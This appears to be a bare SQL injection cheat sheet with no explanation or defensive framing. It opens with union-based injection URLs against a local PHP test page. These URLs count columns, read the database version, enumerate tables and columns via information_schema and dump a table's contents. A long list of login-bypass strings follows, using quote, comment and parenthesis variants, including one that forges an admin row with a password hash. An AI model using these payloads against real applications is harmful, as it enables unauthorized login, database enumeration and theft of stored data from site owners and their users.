http://localhost:8888/php/sql.php?id=1%20order%20by%2010--.
http://localhost:8888/php/sql.php?id=-1 UNION ALL SELECT 1,2,3,4—
localhost:8888/php/sql.php?id=-1 UNION ALL SELECT 1,@@version,3,4—
http://localhost:8888/php/sql.php?id=-1%20UNION%20SELECT%201,table_name,3,4%20from%20information_schema.tables%20WHERE%20table_schema=database()
http://localhost:8888/php/sql.php?id=-1%20UNION%20SELECT%201,group_concat(column_name),3,4%20FROM+information_schema.columns%20WHERE%20table_schema=database()
http://localhost:8888/php/sql.php?id=-1%20UNION%20SELECT%201,group_concat(id,title,mb,test),3,4%20FROM%20test

Bypass:
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
') or '1'='1--
' or 1=1/*
' UNION SELECT 1, 'anotheruser', 'doesnt matter', 1-- (MySQL)
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
